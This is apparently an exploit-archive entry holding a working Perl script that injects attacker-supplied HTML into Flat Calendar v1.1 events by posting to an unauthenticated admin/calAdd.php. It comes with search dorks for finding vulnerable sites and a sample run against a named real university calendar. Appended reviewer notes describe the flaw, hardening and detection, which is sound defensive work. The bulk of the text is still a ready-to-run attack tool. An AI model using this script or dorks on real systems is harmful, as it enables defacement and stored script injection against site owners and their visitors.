Flat Calendar 1.1 HTML Injection

2014.12.09
Credit: ZoRLu
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

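#!/usr/bin/perl -w
#Title : Flat Calendar v1.1 HTML Injection Exploit
#Download : http://www.circulargenius.com/flatcalendar/FlatCalendar-v1.1.zip
#Author : ZoRLu / zorlu@milw00rm.com
#Website : http://milw00rm.com / its online
#Twitter : https://twitter.com/milw00rm or @milw00rm
#Test : Windows7 Ultimate
#Date : 08/12/2014
#Thks : exploit-db.com, packetstormsecurity.com, securityfocus.com, sebug.net and others
#BkiAdam : Dr.Ly0n, KnocKout, LifeSteaLeR, Nicx (in alphabetical order :)) )
#Dork1 : intext:"Flat Calendar is powered by Flat File DB"
#Dork2 : inurl:"viewEvent.php?eventNumber="
#
#C:\Users\admin\Desktop>perl flat.pl
#
#Usage: perl flat.pl http://target.com /calender_path/ indexfile nickname
#Exam1: perl flat.pl http://localhost / index.html ZoRLu
#Exam2: perl flat.pl http://localhost /calendar/ index.html ZoRLu
#
#C:\Users\admin\Desktop>perl flat.pl http://jcbc.jesus.cam.ac.uk /member_content/diaries/womens/calendar/ index.html ZoRLu
#
#[+] Target: http://jcbc.jesus.cam.ac.uk
#[+] Path: /member_content/diaries/womens/calendar/
#[+] index: index.html
#[+] Nick: ZoRLu
#[+] Exploit Succes
#[+] Searching url...
#[+] YourEventNumber = 709
#[+] http://jcbc.jesus.cam.ac.uk/member_content/diaries/womens/calendar/viewEvent.php?eventNumber=709

# ---------------------------------------------------------------------------
# Reviewer notes (defensive reading of this proof of concept)
#
# What the script shows:
#   * It sends an ordinary form POST to <url><path>admin/calAdd.php with no
#     cookie, session or credential attached, and treats the response text
#     "Record Added: taking you back" as success.  The sample run above
#     reports success, which suggests the add-event handler under admin/
#     did not enforce authentication on the tested install.
#   * Each line of the local input file is submitted as the "description"
#     field of a separate new event.  Per the advisory title that value is
#     later rendered as HTML; the rendering code is not part of this page,
#     so the exact sink (presumably viewEvent.php) should be confirmed.
#
# Hardening for site owners:
#   * Require an authenticated, authorised session for every script under
#     admin/, or restrict that directory at the web server.
#   * HTML-encode the event, description and submitted fields whenever they
#     are written into a page (in PHP, htmlspecialchars() with ENT_QUOTES).
#
# Detection:
#   * LWP::UserAgent is used with default settings, so unless changed the
#     requests carry a "libwww-perl/<version>" User-Agent.  POSTs to
#     admin/calAdd.php with that agent, or with no preceding login, are
#     worth alerting on.
#   * Review stored events for markup in the description field.
# ---------------------------------------------------------------------------

use HTTP::Request::Common qw( POST );
use LWP::UserAgent;
use IO::Socket;
use strict;
use warnings;

# Clear the terminal and print the usage text.
sub hlp {
    system(($^O eq 'MSWin32') ? 'cls' : 'clear');
    print "\nUsage: perl $0 http://target.com /calender_path/ indexfile nickname\n";
    print "Exam1: perl $0 http://localhost / index.html ZoRLu\n";
    print "Exam2: perl $0 http://localhost /calendar/ index.html ZoRLu\n";
}

# Exactly four positional arguments are expected.
if (@ARGV != 4) {
    hlp();
    exit();
}

my $ua    = LWP::UserAgent->new;
my $url   = $ARGV[0];    # scheme and host
my $path  = $ARGV[1];    # calendar directory, with leading and trailing slash
my $index = $ARGV[2];    # local file whose lines become event descriptions
my $nick  = $ARGV[3];    # value sent in the "submitted" field

# The add-event handler lives under admin/; no login step precedes the POST.
my $vuln = $url . $path . "admin/calAdd.php";

print "\n[+] Target: ".$url."\n";
print "[+] Path: ".$path."\n";
print "[+] index: ".$index."\n";
print "[+] Nick: ".$nick."\n";

# The event is dated with today's local date.
my @months = qw(January February March April May June July August September October November December);
my ($day, $month, $yearset) = (localtime)[3,4,5];
my $year = 1900 + $yearset;
my $moon = $months[$month];

# Three-argument open: the original two-argument form let a file name that
# starts with '>' or ends with '|' be read as a mode or a command instead of
# a path to read.
if (open(my $fh, '<', $index)) {
    while (my $row = <$fh>) {
        chomp $row;

        # One POST, and therefore one stored event, per input line.
        my $req = POST $vuln, [
            event       => 'Test Page',
            description => $row,
            month       => $moon,
            day         => $day,
            year        => $year,
            submitted   => $nick,
        ];
        my $resp = $ua->request($req);

        if ($resp->is_success) {
            my $message = $resp->decoded_content;
            my $regex   = "Record Added: taking you back";

            if ($message =~ /$regex/) {
                print "[+] Exploit Succes\n";

                # Fetch the public calendar page to find the new event's id.
                my $newua  = LWP::UserAgent->new( );
                my $newurl = $url . $path . "calendar.php";
                my $newreq = $newua->get($newurl);

                if ($newreq->is_success) {
                    my $newmessage = $newreq->decoded_content;

                    # Last occurrence of the link prefix; 26 is the length
                    # of that prefix, and the next 4 characters are taken
                    # as the event number without further validation.
                    my $first = rindex($newmessage,"viewEvent.php?eventNumber=");
                    print "[+] Searching url...\n";
                    my $request = substr($newmessage, $first+26, 4);
                    print "[+] YourEventNumber = $request\n";
                    sleep(1);
                    print "[+] ".$url.$path."viewEvent.php?eventNumber=".$request."\n";
                }
                else {
                    print "[-] HTTP POST error code: ", $newreq->code, "\n";
                    print "[-] HTTP POST error message: ", $newreq->message, "\n";
                }
            }
            else {
                print "[-] Exploit Failed";
            }
        }
        else {
            print "[-] HTTP POST error code: ", $resp->code, "\n";
            print "[-] HTTP POST error message: ", $resp->message, "\n";
        }
    }
    close $fh;
}
else {
    sleep(1);
    die ("[-] NotFound: $index\n");
}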

